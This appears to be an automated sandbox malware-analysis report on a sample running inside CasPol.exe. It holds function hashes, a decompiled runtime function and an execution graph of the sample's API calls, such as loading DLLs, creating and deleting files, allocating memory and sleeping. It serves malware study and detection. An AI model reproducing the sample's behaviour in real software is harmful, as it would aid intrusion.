                                                                        • Instruction ID: 5b6b0bb91b099fa068f7a9519acfcffce6e388545faf204f0aab4ff653bcda33
                                                                        • Opcode Fuzzy Hash: f580b37440ea1b40bef5e060f60a09b49e8a0cbc4f3a891b2c38fae641ca1829
                                                                        • Instruction Fuzzy Hash: 2590027164500402D14271DA44046060009B7D0281F91C023A0414559EC7F58A5ABAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013FB040 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa8d08fa71378219203dd0432dc4a8e65efaa4f42e4bf63637d995dde73a1b5c
                                                                        • Instruction ID: 8769316c30c5af9dbe2ab9646ca24aa8c828adcaa3aa40d6f626930bf6c1498d
                                                                        • Opcode Fuzzy Hash: aa8d08fa71378219203dd0432dc4a8e65efaa4f42e4bf63637d995dde73a1b5c
                                                                        • Instruction Fuzzy Hash: DB9002A1A05140434541B1DA48044065015B7E1341391C132A0444565CC7F88859A2A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F98A0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee6f08eeaa4136aa1bd45f1324ecc3b8dadcf228428e1975773c3a63aca5090f
                                                                        • Instruction ID: e5f652dcd0e4b1a42acd15d7281bef5674c5972135db9692e3cb3ebbf99fd506
                                                                        • Opcode Fuzzy Hash: ee6f08eeaa4136aa1bd45f1324ecc3b8dadcf228428e1975773c3a63aca5090f
                                                                        • Instruction Fuzzy Hash: 4890026170500402D10361DA44146060009E7D1385F91C023E141455ADC7B58957B172
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9B00 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 70f9c85a3365f56f30a80a91937edd8da478d97e70b2b35c42046272f63f303c
                                                                        • Instruction ID: 1b47f55435513f27ddab59250aee45eeab6d765e6e1053d026db3eae69ae8170
                                                                        • Opcode Fuzzy Hash: 70f9c85a3365f56f30a80a91937edd8da478d97e70b2b35c42046272f63f303c
                                                                        • Instruction Fuzzy Hash: 6590026164500802D14171DA84147070006E7D0641F51C022A0014559DC7B6896976F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013FA3B0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 78ea6de68626f20124fe02ef922ff891a68e89835297309caf8778eb70aef3de
                                                                        • Instruction ID: 728e0abc6ecbfb432af5d30934640af3adb8dbe595609fa7176205f239501293
                                                                        • Opcode Fuzzy Hash: 78ea6de68626f20124fe02ef922ff891a68e89835297309caf8778eb70aef3de
                                                                        • Instruction Fuzzy Hash: 4090027160544002D14171DA844460B5005B7E0341F51C422E0415559CC7B5885AA261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9A10 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 317a214486ed36e8bd5fd15e521c45979b2f34e4625a60a8f35840ba5248c21e
                                                                        • Instruction ID: c3ad7507c8ca39083fd8ea617ab3655934b8575d50c6feb407b03b2ba4f89793
                                                                        • Opcode Fuzzy Hash: 317a214486ed36e8bd5fd15e521c45979b2f34e4625a60a8f35840ba5248c21e
                                                                        • Instruction Fuzzy Hash: 4790027160540402D10161DA48087470005A7D0342F51C022A515455AEC7F5C8957571
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9A80 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa989ac076767a8bf35cfb0179f442c452326e20a0aff67ad2a18db933322040
                                                                        • Instruction ID: 72b4554e8ab5f189e0620ccccdaddc2bfee474240d093dbc3cb22bad2b0ffad6
                                                                        • Opcode Fuzzy Hash: fa989ac076767a8bf35cfb0179f442c452326e20a0aff67ad2a18db933322040
                                                                        • Instruction Fuzzy Hash: 9C90026160544442D14162DA4804B0F4105A7E1242F91C02AA4146559CCAB588596761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013FAD30 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d7a531ef658e025f61a5398fdb3ad7987ff7eb36140d1f0853713f8bb43efe81
                                                                        • Instruction ID: e0f004f86adb49c3f12257e0d4413ad32fb6a803726ff3d14ed8fa7b18b1b20f
                                                                        • Opcode Fuzzy Hash: d7a531ef658e025f61a5398fdb3ad7987ff7eb36140d1f0853713f8bb43efe81
                                                                        • Instruction Fuzzy Hash: E5900271E0900012914171DA48146464006B7E0781B55C022A0504559CCAF48A5963E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 97ecb3f8f7f741a6bc63571048619f15f6467e05f6af16b7399537f7d256f198
                                                                        • Instruction ID: bc420ffaf0bc72fcac7f2a3847d1ce2466ab16629c2b1f8651dfb2bbc6d8e371
                                                                        • Opcode Fuzzy Hash: 97ecb3f8f7f741a6bc63571048619f15f6467e05f6af16b7399537f7d256f198
                                                                        • Instruction Fuzzy Hash: D99002E1605140924501A2DA8404B0A4505A7E0241B51C027E1044565CC6B58855A175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9560 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 56e842d4c18db927a41b4d5bcb0333a26697c34ab17f3944d585ab177ba2e553
                                                                        • Instruction ID: 738035e2d57beb0a1b68fbcf05df0c8eddb89f23d8c35b9710471d150d4efa71
                                                                        • Opcode Fuzzy Hash: 56e842d4c18db927a41b4d5bcb0333a26697c34ab17f3944d585ab177ba2e553
                                                                        • Instruction Fuzzy Hash: 96900265625000020146A5DA060450B0445B7D6391391C026F1406595CC7B188696361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F95F0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 74f9e53adf1c82243bb7483b9d967e449721041281885879bf4979cd2ad380f1
                                                                        • Instruction ID: ba71627fdc10d0ea7fd8af3d782e5727bf2ffde1a69c08fa723782fbb7131b48
                                                                        • Opcode Fuzzy Hash: 74f9e53adf1c82243bb7483b9d967e449721041281885879bf4979cd2ad380f1
                                                                        • Instruction Fuzzy Hash: 9190027160500802D10561DA48046860005A7D0341F51C022A601465AED7F588957171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9730 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2641efef22b319b6b1318a3eb0624e3ff7048d5646fe7f6707b785aac6c3ed6e
                                                                        • Instruction ID: 13dde40da5809c6462b9b04e28dcdb15a5f4ab17b8215bcb1968bf5cafc6d840
                                                                        • Opcode Fuzzy Hash: 2641efef22b319b6b1318a3eb0624e3ff7048d5646fe7f6707b785aac6c3ed6e
                                                                        • Instruction Fuzzy Hash: 78900261A0900402D14171DA54187060015A7D0241F51D022A0014559DC7F98A5976E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013FA710 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 66fcbe32907c58b8d25fb62dbbf8627930160c73ba70e6bbea2fad2c2e3a1145
                                                                        • Instruction ID: 731090d927ea4a7ae5d42aa78fc926bb1f1630f76ed6d9d1c1681c165d766c36
                                                                        • Opcode Fuzzy Hash: 66fcbe32907c58b8d25fb62dbbf8627930160c73ba70e6bbea2fad2c2e3a1145
                                                                        • Instruction Fuzzy Hash: 36900271705000529501A6DA5804A4A4105A7F0341B51D026A4004559CC6F488656161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9770 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eba3dfdae6d4831518ff796d61799406b09c986cca57e32b9432908ea3c67a37
                                                                        • Instruction ID: 8d773b436a29e26305b8daabb076577eda7d03d453b1bda79d5073f273924d91
                                                                        • Opcode Fuzzy Hash: eba3dfdae6d4831518ff796d61799406b09c986cca57e32b9432908ea3c67a37
                                                                        • Instruction Fuzzy Hash: B590026160904442D10165DA5408A060005A7D0245F51D022A105459ADC7B58855B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013FA770 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a416e68d411016b5ae8de4ed5a6b7895a250ae3fe7b6cc5aeac9269e2a5e2043
                                                                        • Instruction ID: 89e34f3b86104ba13d7198f8bdadedaa405d804aa40681ed02ff5829c3ba9539
                                                                        • Opcode Fuzzy Hash: a416e68d411016b5ae8de4ed5a6b7895a250ae3fe7b6cc5aeac9269e2a5e2043
                                                                        • Instruction Fuzzy Hash: 2A90027560904442D50165DA5804A870005A7D0345F51D422A041459DDC7F48865B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9760 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 71ac704a6342b5ef783d5c0f16edad52c9bce15dc9e3860ce3ca046129548f07
                                                                        • Instruction ID: dc6887bb1064d7d67993a75c42557b82a6963d3c9bbce837f55402f06dddbe41
                                                                        • Opcode Fuzzy Hash: 71ac704a6342b5ef783d5c0f16edad52c9bce15dc9e3860ce3ca046129548f07
                                                                        • Instruction Fuzzy Hash: F690027160500403D10161DA55087070005A7D0241F51D422A041455DDD7F688557161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9610 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 787440e70d1488da9ce08353e584e7d9d89ed8d864a6d92ccb3610d8decd06b6
                                                                        • Instruction ID: 165b91137f101bed9c8d62c0c4b5bb92a6ee076ed822e2ed479cbc0b9280f496
                                                                        • Opcode Fuzzy Hash: 787440e70d1488da9ce08353e584e7d9d89ed8d864a6d92ccb3610d8decd06b6
                                                                        • Instruction Fuzzy Hash: 1B900271A0900802D15171DA44147460005A7D0341F51C022A0014659DC7F58A5976E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9650 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7303e91e71f3cdea21a4bb90d33529c9944ca8365fe08c4c7d1d03769577fe5c
                                                                        • Instruction ID: c77342b14926150aa2424306610af67b9a650b02000808e93db813f695e94d2b
                                                                        • Opcode Fuzzy Hash: 7303e91e71f3cdea21a4bb90d33529c9944ca8365fe08c4c7d1d03769577fe5c
                                                                        • Instruction Fuzzy Hash: 5B90027160904842D14171DA4404A460015A7D0345F51C022A0054699DD7B58D59B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F96D0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4085c00c96a7674ed1eaaf8acb13548a76b4338bb7e5d142f7f2fd30b1457994
                                                                        • Instruction ID: be4ccc1fea1470d46844a7a6056f8cf6075f7748bf8f9ae10854c9126cece1f6
                                                                        • Opcode Fuzzy Hash: 4085c00c96a7674ed1eaaf8acb13548a76b4338bb7e5d142f7f2fd30b1457994
                                                                        • Instruction Fuzzy Hash: 4590027160500842D10161DA4404B460005A7E0341F51C027A0114659DC7B5C8557561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 57eb646065f0a8f27c772a2c545156dc597530bb46e81b78a329c24368998b04
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0144FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E0144FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E013FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01445720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01445720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x0144fdda
                                                                        0x0144fde2
                                                                        0x0144fde5
                                                                        0x0144fdec
                                                                        0x0144fdfa
                                                                        0x0144fdff
                                                                        0x0144fe0a
                                                                        0x0144fe0f
                                                                        0x0144fe17
                                                                        0x0144fe1e
                                                                        0x0144fe19
                                                                        0x0144fe19
                                                                        0x0144fe19
                                                                        0x0144fe20
                                                                        0x0144fe21
                                                                        0x0144fe22
                                                                        0x0144fe25
                                                                        0x0144fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0144FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0144FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0144FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: f248511b15d81b1a8dfdc2d37aa06057a5a24662bbd58b612de45f8a5f5a55b6
                                                                        • Instruction ID: b814673143e7402979743169ea80a02bc02f4ccaa48f81df11f56246f8031515
                                                                        • Opcode Fuzzy Hash: f248511b15d81b1a8dfdc2d37aa06057a5a24662bbd58b612de45f8a5f5a55b6
                                                                        • Instruction Fuzzy Hash: 4EF0FC321401017FEB201A4ADC05F23BF5ADB54731F240319F618555E1D972F82086F0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:6.5%
                                                                        Dynamic/Decrypted Code Coverage:1.5%
                                                                        Signature Coverage:2.1%
                                                                        Total number of Nodes:1087
                                                                        Total number of Limit Nodes:116
                                                                        execution_graph 33272 b29710 33273 b29735 33272->33273 33278 b2b150 33273->33278 33277 b2978d 33279 b2b174 33278->33279 33280 b2b1b0 LdrLoadDll 33279->33280 33281 b29768 33279->33281 33280->33281 33281->33277 33282 b2cd10 33281->33282 33283 b2cd3c 33282->33283 33293 b3c6b0 33283->33293 33286 b2cd5c 33286->33277 33288 b2cd7f 33288->33286 33301 b3cce0 33288->33301 33290 b2cd97 33304 b3c960 33290->33304 33292 b2cdba 33292->33277 33307 b3d4a0 33293->33307 33295 b2cd55 33295->33286 33295->33288 33296 b3c6f0 33295->33296 33297 b3d4a0 LdrLoadDll 33296->33297 33298 b3c70c 33297->33298 33317 55d9710 LdrInitializeThunk 33298->33317 33299 b3c727 33299->33288 33302 b3ccff 33301->33302 33303 b3d4a0 LdrLoadDll 33301->33303 33302->33290 33303->33302 33305 b3d4a0 LdrLoadDll 33304->33305 33306 b3c97c NtClose 33305->33306 33306->33292 33308 b3d525 33307->33308 33310 b3d4af 33307->33310 33308->33295 33310->33308 33311 b37830 33310->33311 33312 b3783e 33311->33312 33313 b3784a 33311->33313 33312->33313 33316 b37cb0 LdrLoadDll 33312->33316 33313->33308 33315 b3799c 33315->33308 33316->33315 33317->33299 33318 b3b580 33329 b3e350 33318->33329 33320 b3b5bb 33321 b3b6b6 33320->33321 33322 b2b150 LdrLoadDll 33320->33322 33323 b3b5fb 33322->33323 33324 b37830 LdrLoadDll 33323->33324 33328 b3b620 33324->33328 33325 b3b630 Sleep 33325->33328 33328->33321 33328->33325 33332 b3b1f0 LdrLoadDll 33328->33332 33333 b3b3d0 LdrLoadDll 33328->33333 33334 b3ca10 33329->33334 33331 b3e37d 33331->33320 33332->33328 33333->33328 33335 b3d4a0 LdrLoadDll 33334->33335 33336 b3ca2c NtAllocateVirtualMemory 33335->33336 33336->33331 33337 b4169d 33340 b3df70 33337->33340 33341 b3df96 33340->33341 33348 b2a0e0 33341->33348 33343 b3dfa2 33346 b3dfd0 33343->33346 33356 b290f0 33343->33356 33388 b3cb80 33346->33388 33391 b2a030 33348->33391 33350 b2a0ed 33351 b2a0f4 33350->33351 33403 b29fd0 33350->33403 33351->33343 33357 b29117 33356->33357 33838 b2b620 33357->33838 33359 b29129 33842 b2b370 33359->33842 33361 b2915e 33367 b29165 33361->33367 33885 b2b2a0 LdrLoadDll 33361->33885 33364 b291d5 33365 b3e4b0 2 API calls 33364->33365 33387 b2941d 33364->33387 33366 b291eb 33365->33366 33368 b3e4b0 2 API calls 33366->33368 33367->33387 33846 b2e310 33367->33846 33369 b291fc 33368->33369 33370 b3e4b0 2 API calls 33369->33370 33371 b2920d 33370->33371 33858 b2c890 33371->33858 33373 b2921a 33374 b37420 10 API calls 33373->33374 33375 b2922b 33374->33375 33376 b37420 10 API calls 33375->33376 33377 b2923c 33376->33377 33378 b29260 33377->33378 33379 b37420 10 API calls 33377->33379 33380 b37420 10 API calls 33378->33380 33384 b292a8 33378->33384 33381 b29259 33379->33381 33383 b29277 33380->33383 33886 b2c9e0 LdrLoadDll 33381->33886 33383->33384 33887 b2d380 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33383->33887 33384->33387 33870 b28d70 33384->33870 33387->33346 33389 b3d4a0 LdrLoadDll 33388->33389 33390 b3cb9f 33389->33390 33422 b3b100 33391->33422 33395 b2a056 33395->33350 33396 b2a04c 33396->33395 33429 b3d820 33396->33429 33398 b2a093 33398->33395 33440 b29e70 33398->33440 33400 b2a0b3 33446 b298d0 LdrLoadDll 33400->33446 33402 b2a0c5 33402->33350 33820 b3db10 33403->33820 33406 b3db10 LdrLoadDll 33407 b2a001 33406->33407 33408 b3db10 LdrLoadDll 33407->33408 33409 b2a01a 33408->33409 33410 b2e0d0 33409->33410 33411 b2e0e9 33410->33411 33824 b2b4a0 33411->33824 33413 b2e0fc 33414 b3c6b0 LdrLoadDll 33413->33414 33415 b2e10b 33414->33415 33416 b2a105 33415->33416 33828 b3cca0 33415->33828 33416->33343 33418 b2e122 33419 b2e14d 33418->33419 33831 b3c730 33418->33831 33421 b3c960 2 API calls 33419->33421 33421->33416 33423 b3b10f 33422->33423 33424 b37830 LdrLoadDll 33423->33424 33425 b2a043 33424->33425 33426 b3afc0 33425->33426 33427 b3afd5 33426->33427 33447 b3cad0 LdrLoadDll 33426->33447 33427->33396 33430 b3d839 33429->33430 33448 b37420 33430->33448 33432 b3d851 33433 b3d85a 33432->33433 33487 b3d660 33432->33487 33433->33398 33435 b3d86e 33435->33433 33504 b3c3d0 33435->33504 33437 b3d8a2 33509 b3e3d0 33437->33509 33798 b27660 33440->33798 33442 b29e91 33442->33400 33443 b29e8a 33443->33442 33811 b27920 33443->33811 33446->33402 33447->33427 33449 b37763 33448->33449 33450 b37434 33448->33450 33449->33432 33450->33449 33512 b3c120 33450->33512 33453 b37565 33518 b3c830 33453->33518 33454 b37548 33515 b3c930 33454->33515 33457 b3758c 33459 b3e3d0 2 API calls 33457->33459 33458 b37552 33458->33432 33464 b37598 33459->33464 33460 b37727 33462 b3c960 2 API calls 33460->33462 33461 b3773d 33575 b37140 33461->33575 33465 b3772e 33462->33465 33464->33458 33464->33460 33464->33461 33467 b37630 33464->33467 33465->33432 33466 b37750 33466->33432 33468 b37697 33467->33468 33470 b3763f 33467->33470 33468->33460 33469 b376aa 33468->33469 33615 b3c7b0 33469->33615 33472 b37644 33470->33472 33473 b37658 33470->33473 33614 b37000 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33472->33614 33476 b37675 33473->33476 33477 b3765d 33473->33477 33476->33465 33533 b36dc0 33476->33533 33521 b370a0 33477->33521 33479 b3764e 33479->33432 33482 b3770a 33485 b3c960 2 API calls 33482->33485 33483 b3766b 33483->33432 33484 b3768d 33484->33432 33486 b37716 33485->33486 33486->33432 33488 b3d67b 33487->33488 33489 b3d68d 33488->33489 33490 b3e350 2 API calls 33488->33490 33489->33435 33491 b3d6ad 33490->33491 33642 b36a20 33491->33642 33493 b3d6d0 33493->33489 33494 b36a20 3 API calls 33493->33494 33497 b3d6f2 33494->33497 33496 b3d77a 33498 b3d78a 33496->33498 33769 b3d420 LdrLoadDll 33496->33769 33497->33489 33674 b37d80 33497->33674 33685 b3d290 33498->33685 33501 b3d7b8 33764 b3c390 33501->33764 33503 b3d7e2 33503->33435 33505 b3d4a0 LdrLoadDll 33504->33505 33506 b3c3ec 33505->33506 33792 55d967a 33506->33792 33507 b3c407 33507->33437 33795 b3cb40 33509->33795 33511 b3d8cc 33511->33398 33513 b3d4a0 LdrLoadDll 33512->33513 33514 b37519 33513->33514 33514->33453 33514->33454 33514->33458 33516 b3d4a0 LdrLoadDll 33515->33516 33517 b3c94c NtDeleteFile 33516->33517 33517->33458 33519 b3d4a0 LdrLoadDll 33518->33519 33520 b3c84c NtCreateFile 33519->33520 33520->33457 33522 b370bc 33521->33522 33523 b3c7b0 LdrLoadDll 33522->33523 33524 b370dd 33523->33524 33525 b370e4 33524->33525 33526 b370f8 33524->33526 33527 b3c960 2 API calls 33525->33527 33528 b3c960 2 API calls 33526->33528 33529 b370ed 33527->33529 33530 b37101 33528->33530 33529->33483 33619 